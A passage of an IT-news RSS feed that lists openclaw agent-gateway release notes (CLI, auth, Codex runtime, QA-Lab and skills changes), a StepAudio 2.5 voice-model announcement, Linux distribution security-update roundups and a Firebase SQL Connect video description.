<li>CLI/perf: keep <code>secrets --help</code> and <code>nodes --help</code> on the precomputed help path so parent help avoids loading action-heavy command runtime modules. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4491951847" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84818" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84818/hovercard" href="https://github.com/openclaw/openclaw/pull/84818">#84818</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/frankekn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/frankekn">@frankekn</a>.</li>
<li>CLI/perf: serve <code>doctor</code>, <code>gateway</code>, <code>models</code>, and <code>plugins</code> parent help from startup metadata so common subcommand help avoids full CLI program construction. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4491522584" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84786" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84786/hovercard" href="https://github.com/openclaw/openclaw/pull/84786">#84786</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/frankekn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/frankekn">@frankekn</a>.</li>
<li>Codex/Lossless: keep context-engine history on the canonical run session when Telegram DMs use per-peer runtime policy keys. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4494202248" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84936" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/84936/hovercard" href="https://github.com/openclaw/openclaw/issues/84936">#84936</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4494744767" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84954" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84954/hovercard" href="https://github.com/openclaw/openclaw/pull/84954">#84954</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neeravmakwana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neeravmakwana">@neeravmakwana</a>.</li>
<li>Codex: keep heartbeat response tool schemas durable without exposing dynamic tools disabled by turn policy, so heartbeat wakeups can reuse threads while scoped tool allowlists stay enforced. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4489377860" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84681" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84681/hovercard" href="https://github.com/openclaw/openclaw/pull/84681">#84681</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jalehman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jalehman">@jalehman</a>.</li>
<li>Auth/OAuth: skip the refresh adapter when a stored OAuth credential has no refresh token so agent turns fail fast on missing-key instead of waiting on the 120s refresh timeout. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RomneyDa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RomneyDa">@RomneyDa</a>.</li>
<li>Auth/Codex: load legacy OAuth sidecar credentials in the embedded runner's secrets-runtime auth loaders so Telegram replies, cron-triggered turns, and other isolated sub-agent lanes can reach the existing <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4465275872" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83312" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83312/hovercard" href="https://github.com/openclaw/openclaw/pull/83312">#83312</a> refresh-and-rewrite migration instead of failing with <code>No API key found for provider "openai-codex"</code> until the user runs <code>openclaw doctor</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Totalsolutionsync/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Totalsolutionsync">@Totalsolutionsync</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RomneyDa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RomneyDa">@RomneyDa</a>.</li>
<li>Codex/failover: classify <code>deactivated_workspace</code> as a permanent auth failure so configured fallback models can advance when a Codex workspace is deactivated. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4154052542" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55893" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/55893/hovercard" href="https://github.com/openclaw/openclaw/pull/55893">#55893</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/litang9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/litang9">@litang9</a>.</li>
<li>Exec: keep configured <code>tools.exec.pathPrepend</code> entries ahead of user shell startup PATH changes on POSIX gateway runs. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4437943475" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/81403" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/81403/hovercard" href="https://github.com/openclaw/openclaw/pull/81403">#81403</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/medns/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/medns">@medns</a>.</li>
<li>Gateway/sessions: allow shared-secret bearer callers to read and stream session history without an explicit scope header. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4446205215" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/81815" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/81815/hovercard" href="https://github.com/openclaw/openclaw/pull/81815">#81815</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/medns/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/medns">@medns</a>.</li>
<li>Agents/embedded runner: classify HTML auth provider responses as <code>auth_html</code> and return a re-authentication hint instead of the CDN-blocked copy that <code>upstream_html</code> returns. Cloudflare Access login pages, nginx basic-auth challenges, and gateway login walls all produce HTML auth bodies that were previously misdiagnosed as transient CDN blocks. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4413285415" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/79900" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/79900/hovercard" href="https://github.com/openclaw/openclaw/pull/79900">#79900</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martingarramon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martingarramon">@martingarramon</a>.</li>
<li>TUI/streaming watchdog: dismiss the <code>This response is taking longer than expected</code> notice as soon as a chat event for the same run arrives, so the message no longer sits next to the recovered response when the run was only briefly silent. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4267080618" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67052" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67052/hovercard" href="https://github.com/openclaw/openclaw/issues/67052">#67052</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291861236" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69081" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69081/hovercard" href="https://github.com/openclaw/openclaw/issues/69081">#69081</a> (closed), prior attempt <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291455267" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69026" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69026/hovercard" href="https://github.com/openclaw/openclaw/pull/69026">#69026</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jpruit20/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jpruit20">@jpruit20</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RomneyDa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RomneyDa">@RomneyDa</a>.</li>
<li>Agents/Pi: tolerate OpenClaw-owned transcript writes while embedded prompts are released for model I/O, keeping long-running Feishu, Slack, Telegram, and cron turns from failing with false session-takeover errors. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4475877718" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84059" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/84059/hovercard" href="https://github.com/openclaw/openclaw/issues/84059">#84059</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4479751609" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84250" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84250/hovercard" href="https://github.com/openclaw/openclaw/pull/84250">#84250</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tianxiaochannel-oss88/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tianxiaochannel-oss88">@tianxiaochannel-oss88</a>.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[StepFun Releases StepAudio 2.5 Realtime: An End-to-End Voice Model with Roleplay-Specific RLHF and Paralinguistic Comprehension]]></title>
<description><![CDATA[StepFun, the Shanghai-based AI lab, released StepAudio 2.5 Realtime in May 2026 — an end-to-end real-time speech large language model with fully customizable persona capabilities. The model connects via a WebSocket API, supports Chinese and English, and ranked first across all five benchmark dime...]]></description>
<link>https://tsecurity.de/de/3544348/ai-nachrichten/stepfun-releases-stepaudio-25-realtime-an-end-to-end-voice-model-with-roleplay-specific-rlhf-and-paralinguistic-comprehension/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3544348/ai-nachrichten/stepfun-releases-stepaudio-25-realtime-an-end-to-end-voice-model-with-roleplay-specific-rlhf-and-paralinguistic-comprehension/</guid>
<pubDate>Mon, 25 May 2026 01:03:14 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>StepFun, the Shanghai-based AI lab, released StepAudio 2.5 Realtime in May 2026 — an end-to-end real-time speech large language model with fully customizable persona capabilities. The model connects via a WebSocket API, supports Chinese and English, and ranked first across all five benchmark dimensions tested in April 2026, including an 80.41 human evaluation score and 82.18 on paralinguistic comprehension.</p>
<p>The post <a href="https://www.marktechpost.com/2026/05/24/stepfun-releases-stepaudio-2-5-realtime-an-end-to-end-voice-model-with-roleplay-specific-rlhf-and-paralinguistic-comprehension/">StepFun Releases StepAudio 2.5 Realtime: An End-to-End Voice Model with Roleplay-Specific RLHF and Paralinguistic Comprehension</a> appeared first on <a href="https://www.marktechpost.com/">MarkTechPost</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Friday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (firefox), Debian (chromium, nss, openvpn, and thunderbird), Fedora (cockpit, kernel, and linux-firmware), Oracle (gdk-pixbuf2, kernel, and libsndfile), SUSE (container-suseconnect, cpp-httplib, dnsmasq, firefox, glibc, GraphicsMagick, java-1_8_0-ope...]]></description>
<link>https://tsecurity.de/de/3539657/linux-tipps/security-updates-for-friday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3539657/linux-tipps/security-updates-for-friday/</guid>
<pubDate>Fri, 22 May 2026 15:10:46 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (firefox), <b>Debian</b> (chromium, nss, openvpn, and thunderbird), <b>Fedora</b> (cockpit, kernel, and linux-firmware), <b>Oracle</b> (gdk-pixbuf2, kernel, and libsndfile), <b>SUSE</b> (container-suseconnect, cpp-httplib, dnsmasq, firefox, glibc, GraphicsMagick, java-1_8_0-openj9, kernel, mozjs115, php8, python-urllib3, rekor, rootlesskit, rsync, tiff, ucode-intel, util-linux, and xz), and <b>Ubuntu</b> (bind9, bubblewrap, libarchive, linux-intel-iot-realtime, postgresql-14, postgresql-16, postgresql-17, postgresql-18, and xdg-desktop-portal).]]></content:encoded>
</item>
<item>
<title><![CDATA[PostgreSQL without the setup: quickly build reactive apps with Firebase SQL Connect]]></title>
<description><![CDATA[Author: Firebase - Bewertung: 9x - Views:90 Realtime documentation → https://goo.gle/49KJ8a6 
Using AI assistance with SQL Connect documentation → https://goo.gle/3R3OneQ 

Learn how to build full-stack, reactive apps with Firebase SQL Connect and Postgres. Marissa, a product manager at Firebase,...]]></description>
<link>https://tsecurity.de/de/3537174/it-security-video/postgresql-without-the-setup-quickly-build-reactive-apps-with-firebase-sql-connect/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3537174/it-security-video/postgresql-without-the-setup-quickly-build-reactive-apps-with-firebase-sql-connect/</guid>
<pubDate>Thu, 21 May 2026 18:33:55 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Firebase - Bewertung: 9x - Views:90 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/F79GmQnMD5A?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Realtime documentation → https://goo.gle/49KJ8a6 <br />
Using AI assistance with SQL Connect documentation → https://goo.gle/3R3OneQ <br />
<br />
Learn how to build full-stack, reactive apps with Firebase SQL Connect and Postgres. Marissa, a product manager at Firebase, walks you step by step on how to design your schema, generate queries, integrate realtime in-app features, and more. Whether you're building for iOS, Android, Flutter, or the Web, this demo will work for you!<br />
<br />
Chapters:<br />
0:00 - Introduction<br />
0:28 - What is SQL Connect<br />
1:00 - The app we're building today<br />
2:12 - Generate schema <br />
2:56 - Seed data<br />
3:36 - Generate queries<br />
4:53 - Integrating the app<br />
5:19 - Adding realtime<br />
6:11 - How realtime works<br />
<br />
More resources:<br />
Watch more videos in our playlist: The Full-stack AI Dev Launches → https://goo.gle/full-stack-dev-launch  <br />
<br />
#Firebase <br />
<br />
Subscribe to Firebase → https://goo.gle/Firebase<br />
<br />
Speaker: Marissa Christy<br />
Products Mentioned: Firebase Firebase Data Connect,  Firebase Authentication, Firebase MCP server<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Wednesday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (kernel, libpng, nginx, nginx:1.24, ruby, and ruby:3.3), Debian (gnutls28 and linux-6.1), Fedora (dnsmasq, kernel, keylime-agent-rust, perl-Net-CIDR-Lite, python-pysam, python-urllib3, rust-cargo-vendor-filterer, rust-ingredients, rust-oo7-cli, rust-...]]></description>
<link>https://tsecurity.de/de/3533100/linux-tipps/security-updates-for-wednesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3533100/linux-tipps/security-updates-for-wednesday/</guid>
<pubDate>Wed, 20 May 2026 15:11:25 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (kernel, libpng, nginx, nginx:1.24, ruby, and ruby:3.3), <b>Debian</b> (gnutls28 and linux-6.1), <b>Fedora</b> (dnsmasq, kernel, keylime-agent-rust, perl-Net-CIDR-Lite, python-pysam, python-urllib3, rust-cargo-vendor-filterer, rust-ingredients, rust-oo7-cli, rust-rpki, rust-sevctl, and rust-tealdeer), <b>Mageia</b> (bind), <b>Oracle</b> (bind, giflib, gimp:2.8, kernel, libpng, rsync, ruby, and vim), <b>Slackware</b> (haveged and mozilla), <b>SUSE</b> (cockpit, dnsmasq, erlang26, freeipmi, git-bug, glibc, GraphicsMagick, haveged, ImageMagick, iproute2, kernel, openssh, perl-CryptX, perl-HTTP-Tiny, postgresql14, postgresql15, postgresql16, python-Pillow, rsync, tiff, and traefik), and <b>Ubuntu</b> (Highlight.js, linux, linux-aws, linux-aws-5.15, linux-aws-fips, linux-fips, linux-gcp,
 linux-gcp-fips, linux-gke, linux-gkeop, linux-hwe-5.15, linux-ibm,
 linux-ibm-5.15, linux-intel-iotg, linux-intel-iotg-5.15, linux-kvm,
 linux-nvidia, linux-nvidia-tegra, linux-nvidia-tegra-5.15, linux-oracle,
 linux-raspi, linux-realtime, linux, linux-aws, linux-aws-fips, linux-bluefield, linux-fips, linux-gcp,
 linux-gcp-5.4, linux-gcp-fips, linux-ibm, linux-ibm-5.4, linux-kvm,
 linux-oracle, linux-oracle-5.4, linux-xilinx-zynqmp, linux, linux-aws, linux-aws-fips, linux-fips, linux-gcp-4.15,
 linux-gcp-fips, linux-kvm, linux-oracle, linux, linux-aws, linux-aws-fips, linux-gcp, linux-gcp-fips, linux-gke,
 linux-gkeop, linux-ibm, linux-ibm-6.8, linux-lowlatency,
 linux-lowlatency-hwe-6.8, linux-raspi, linux-raspi-realtime,
 linux-realtime, linux-realtime-6.8, linux, linux-aws, linux-hwe-6.17, linux-oem-6.17, linux-oracle,
 linux-raspi, linux-realtime, linux-realtime-6.17, and smarty3).]]></content:encoded>
</item>
<item>
<title><![CDATA[openclaw 2026.5.19-beta.1]]></title>
<description><![CDATA[2026.5.19
Changes

Agents: clarify that fixes should default to clean bounded refactors, lean internals, and explicit plugin SDK/API deprecation paths.
Dependencies: update @openclaw/proxyline to 0.3.3.
Dependencies: update Pi packages to 0.75.1 and raise the minimum supported Node.js 22 line to ...]]></description>
<link>https://tsecurity.de/de/3527452/downloads/openclaw-2026519-beta1/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3527452/downloads/openclaw-2026519-beta1/</guid>
<pubDate>Tue, 19 May 2026 01:01:25 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>2026.5.19</h2>
<h3>Changes</h3>
<ul>
<li>Agents: clarify that fixes should default to clean bounded refactors, lean internals, and explicit plugin SDK/API deprecation paths.</li>
<li>Dependencies: update <code>@openclaw/proxyline</code> to 0.3.3.</li>
<li>Dependencies: update Pi packages to 0.75.1 and raise the minimum supported Node.js 22 line to 22.19.</li>
<li>Docker/Podman: add <code>OPENCLAW_IMAGE_APT_PACKAGES</code> as the runtime-neutral image build arg for extra apt packages while keeping <code>OPENCLAW_DOCKER_APT_PACKAGES</code> as a legacy fallback. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4217026381" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62431" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/62431/hovercard" href="https://github.com/openclaw/openclaw/pull/62431">#62431</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/urtabajev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/urtabajev">@urtabajev</a>.</li>
<li>Gateway/ACPX: attribute startup probe, config, runtime, and resource-count costs in restart traces without changing readiness behavior. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4465177610" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83300" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83300/hovercard" href="https://github.com/openclaw/openclaw/pull/83300">#83300</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samzong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samzong">@samzong</a>.</li>
<li>Gateway: overlap startup logging and plugin-service startup with channel sidecars to reduce restart ready latency while preserving <code>/readyz</code> sidecar gating. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4465177851" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83301" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83301/hovercard" href="https://github.com/openclaw/openclaw/pull/83301">#83301</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samzong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samzong">@samzong</a>.</li>
<li>Plugins/admin-http-rpc: allow trusted admin HTTP RPC clients to start and wait for web QR login flows. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4464874472" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83259" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83259/hovercard" href="https://github.com/openclaw/openclaw/pull/83259">#83259</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/liorb-mountapps/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/liorb-mountapps">@liorb-mountapps</a>.</li>
<li>Mac app: redesign Settings pages with consistent card layouts, cached navigation, cleaner permissions/voice/skills/cron/exec/debug panes, and steadier spacing around the native sidebar.</li>
<li>Skills: rename the repo-local Codex closeout review skill and helper to <code>autoreview</code> while preserving the Codex-first fallback behavior.</li>
<li>Skills: add a meme-maker skill for curated template search, local SVG/PNG rendering, Imgflip hosted rendering, and Know Your Meme provenance links.</li>
<li>Skills CLI: allow <code>openclaw skills install</code> and <code>openclaw skills update</code> to target shared managed skills with <code>--global</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351987851" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74466" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74466/hovercard" href="https://github.com/openclaw/openclaw/pull/74466">#74466</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Marvae/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Marvae">@Marvae</a>.</li>
<li>Browser: surface pending and recently handled modal dialogs in snapshots, return <code>blockedByDialog</code> when an action opens a modal, and allow <code>browser dialog --dialog-id</code> to answer pending dialogs.</li>
<li>Browser CLI: add <code>openclaw browser evaluate --timeout-ms</code> so long-running page functions can extend both the evaluate action and request timeout budgets. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4466445698" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83447" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83447/hovercard" href="https://github.com/openclaw/openclaw/pull/83447">#83447</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eefreenyc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eefreenyc">@eefreenyc</a>.</li>
<li>Codex app-server: scope OpenClaw prompt guidance by runtime surface so native Codex keeps Codex-owned base/personality instructions while OpenClaw contributes only runtime context, delivery guidance, and explicitly scoped command hints. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4466538467" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83454" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83454/hovercard" href="https://github.com/openclaw/openclaw/pull/83454">#83454</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
<li>Agents/tools: shorten built-in tool descriptions and schema hints across media, messaging, sessions, cron, Gateway, web, image/PDF, TTS, nodes, and plan tools while preserving routing guardrails.</li>
<li>Skills: add node inspector debugging, fused diagram generation, and throwaway spike workflow skills.</li>
<li>CLI/plugins: add <code>defineToolPlugin</code> plus <code>openclaw plugins build</code>, <code>validate</code>, and <code>init</code> for typed simple tool plugins with generated manifest metadata, optional tool declarations, and context factories.</li>
<li>Agents/skills: tighten bundled skill prompts and metadata, quote skill descriptions, refresh current CLI/API guidance, and update embedded sherpa-onnx runtime downloads.</li>
<li>Skills: update the Obsidian skill to target the official <code>obsidian</code> CLI and require its registered binary instead of the third-party <code>obsidian-cli</code>.</li>
<li>Skills: add a Python debugging skill for pdb, breakpoint(), post-mortem inspection, and debugpy remote attach.</li>
<li>Plugins/messages: add presentation capability limits for channel renderers, adapt rich message controls before native rendering, and mark legacy <code>interactive</code>/Slack directive producer APIs as deprecated.</li>
<li>Plugins/subagents: store channel delivery routes as canonical session metadata and deprecate ad hoc subagent hook delivery-origin fields in favor of core route projection.</li>
<li>Proxy: support HTTPS managed forward-proxy endpoints and scoped <code>proxy.tls.caFile</code> CA trust for proxy endpoint TLS. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4403048153" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/79171" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/79171/hovercard" href="https://github.com/openclaw/openclaw/pull/79171">#79171</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jesse-merhi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jesse-merhi">@jesse-merhi</a>.</li>
<li>QA-Lab: add first-hour 20-turn and optional 100-turn runtime parity scenarios, with tier metadata for standard and soak QA gates. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4416188988" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80338" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/80338/hovercard" href="https://github.com/openclaw/openclaw/issues/80338">#80338</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4416188383" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80337" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/80337/hovercard" href="https://github.com/openclaw/openclaw/issues/80337">#80337</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
<li>QA-Lab: add <code>openclaw qa suite --runtime-parity-tier</code> and wire the standard Codex-vs-Pi tier into release checks separately from optional/live-only/soak lanes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4416188383" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80337" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/80337/hovercard" href="https://github.com/openclaw/openclaw/issues/80337">#80337</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
<li>QA-Lab: add a live-only Codex Pi-shaped Read vocabulary canary so runtime parity catches native workspace-read prompt compatibility drift. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4416039198" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80323" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/80323/hovercard" href="https://github.com/openclaw/openclaw/pull/80323">#80323</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
<li>QA-Lab: add live-only harness self-health scenarios for plugin hook crashes, manifest contract errors, and WebChat direct-reply self-message routing. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4416039198" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80323" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/80323/hovercard" href="https://github.com/openclaw/openclaw/pull/80323">#80323</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
<li>QA-Lab: add runtime tool fixture scenarios and coverage reporting for Codex-native workspace tools, OpenClaw dynamic tools, and optional plugin-backed tools. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4415099454" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80173" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/80173/hovercard" href="https://github.com/openclaw/openclaw/issues/80173">#80173</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
<li>QA-Lab: expose runtime tool fixture coverage through <code>openclaw qa coverage --tools</code>, with optional suite-summary evaluation for parity gate artifacts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
